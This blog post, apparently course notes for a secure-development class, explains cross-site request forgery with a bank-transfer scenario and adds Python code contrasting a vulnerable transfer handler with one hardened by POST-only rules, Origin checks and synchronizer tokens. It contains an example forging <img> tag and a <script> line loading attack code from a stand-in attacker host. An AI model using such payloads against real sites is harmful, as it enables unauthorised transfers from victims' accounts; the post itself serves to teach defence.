Cross-site Request Forgery (CSRF)

Posted on October 21, 2012. Filed under: SANS Dev 541 |


A cross-site request forgery (CSRF) attack exploits the trust a website places in its users.

Malicious code is embedded on a site the attacker controls. When a user happens to visit that site, the user's browser sends a GET or POST request to the victim website on behalf of that user. If the user has a valid session on the victim website, the attacker can perform malicious actions as that valid user.

Let's take an example.

  1. Step one: the victim visits his bank website and logs in to his account.
  2. Step two: the same user browses a bulletin board website while still holding a valid session on the bank website.
  3. Step three: there is an image tag on the bulletin board website whose location does not point to a real image, but to the bank website. When the image tag is rendered, the request is sent to the bank website requesting a $1000 transfer from the victim's bank account to the attacker's bank account.

<img src="http://goodbank.com/transfer.jsp?receiver=badguy&amount=1000">

The attacker can go one step further and embed a script tag in the bulletin board website, which loads malicious code from the attacker's website to perform more sophisticated attacks.

<script src="http://attacker_code_store/attack_bank.js"></script>

In attack_bank.js:

alert('I can do anything here!');
parseResponse();
modifyHTTPHeaders();
addRecipient();
transferMoney();

function parseResponse() {
    ...   // the bodies of these functions are elided in the original post
}

The attacker can use the Ajax XMLHttpRequest object to programmatically send a series of HTTP POST requests that perform actions such as parsing the response, modifying HTTP headers, adding a recipient, transferring money, and so on. Meanwhile, the bank site believes that a valid user is browsing the website and performing legitimate transactions.
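To show why the transfer endpoint above is forgeable and what stops it, here is an added example (not code from the original post) that models the bank's transfer handler in Python twice: once as described, trusting the session cookie alone, and once hardened with the usual CSRF defences (state change only on POST, an Origin check, and a per-session synchronizer token bound to the session with a keyed hash). The endpoint path /transfer.jsp and the receiver name badguy come from the post; the user alice, the balances, the bulletin-board origin and all function names are constructed for the example.

```python
import hmac
import hashlib
import secrets
from dataclasses import dataclass, field

# Constructed in-memory "bank" state (hypothetical, not from the original post).
SESSIONS = {}                              # session cookie value -> username
BALANCES = {"alice": 5000, "badguy": 0}
SERVER_SECRET = secrets.token_bytes(32)    # in production: kept out of source, rotated
SITE_ORIGIN = "http://goodbank.com"


@dataclass
class Request:
    """Minimal model of one HTTP request as the bank server sees it."""
    method: str
    path: str
    cookies: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)
    params: dict = field(default_factory=dict)   # query string or form body


def login(username):
    """Create a session and return the cookie value the browser would store."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = username
    return sid


def csrf_token_for(session_id):
    """Synchronizer token derived from the session id with HMAC-SHA256.
    It is unguessable without SERVER_SECRET and needs no extra server storage;
    the bank renders it into its own forms, where a third-party page cannot read it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(req):
    """The endpoint as described in the post: any request carrying a valid
    session cookie is honoured, whether it came from an <img> tag or from
    script running on another site."""
    user = SESSIONS.get(req.cookies.get("session"))
    if user is None:
        return 401, "not logged in"
    receiver = req.params.get("receiver")
    try:
        amount = int(req.params.get("amount", 0))
    except ValueError:
        return 400, "bad amount"
    if amount <= 0 or receiver not in BALANCES or BALANCES.get(user, 0) < amount:
        return 400, "invalid transfer"
    BALANCES[user] -= amount
    BALANCES[receiver] += amount
    return 200, "ok"


def transfer_hardened(req):
    """Same endpoint with CSRF defences layered in front of the business logic."""
    if req.method != "POST":                      # an <img> fetch is always GET
        return 405, "state change requires POST"
    user = SESSIONS.get(req.cookies.get("session"))
    if user is None:
        return 401, "not logged in"
    origin = req.headers.get("Origin")            # browsers set it on cross-site POSTs
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-origin request rejected"
    expected = csrf_token_for(req.cookies["session"])
    supplied = req.params.get("csrf_token", "")
    if not hmac.compare_digest(expected, supplied):   # constant-time comparison
        return 403, "missing or invalid CSRF token"
    return transfer_vulnerable(req)               # checks passed; reuse the transfer logic


def simulate():
    """Replay the post's scenario against both handlers and report the outcomes."""
    sid = login("alice")
    # Forged GET from the bulletin board's <img> tag: the browser attaches alice's
    # cookie, sends no Origin for a plain image fetch, and carries no token.
    forged_get = Request("GET", "/transfer.jsp", cookies={"session": sid},
                         params={"receiver": "badguy", "amount": "1000"})
    # Forged POST fired by attack_bank.js: the browser sets Origin to the page
    # that sent it, and the script cannot read the bank's token.
    forged_post = Request("POST", "/transfer.jsp", cookies={"session": sid},
                          headers={"Origin": "http://bulletinboard.example"},
                          params={"receiver": "badguy", "amount": "1000"})
    # Genuine POST from the bank's own form, which includes the rendered token.
    genuine = Request("POST", "/transfer.jsp", cookies={"session": sid},
                      headers={"Origin": SITE_ORIGIN},
                      params={"receiver": "badguy", "amount": "100",
                              "csrf_token": csrf_token_for(sid)})
    return {
        "vuln_get": transfer_vulnerable(forged_get)[0],    # 200: forgery succeeds
        "hard_get": transfer_hardened(forged_get)[0],      # 405: GET rejected
        "hard_post": transfer_hardened(forged_post)[0],    # 403: wrong Origin
        "hard_genuine": transfer_hardened(genuine)[0],     # 200: real user allowed
        "balances": dict(BALANCES),
    }


if __name__ == "__main__":
    print(simulate())
```

The three checks are independent layers: the POST-only rule defeats the image tag, the Origin check defeats scripted cross-site requests from modern browsers, and the synchronizer token defeats both even when a header is absent or stripped. Marking the session cookie SameSite=Lax or Strict is a further browser-side layer, since the cookie is then not attached to cross-site requests at all.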

The following video is another example, where the malicious code is embedded in an iframe which is invisible to the victim.
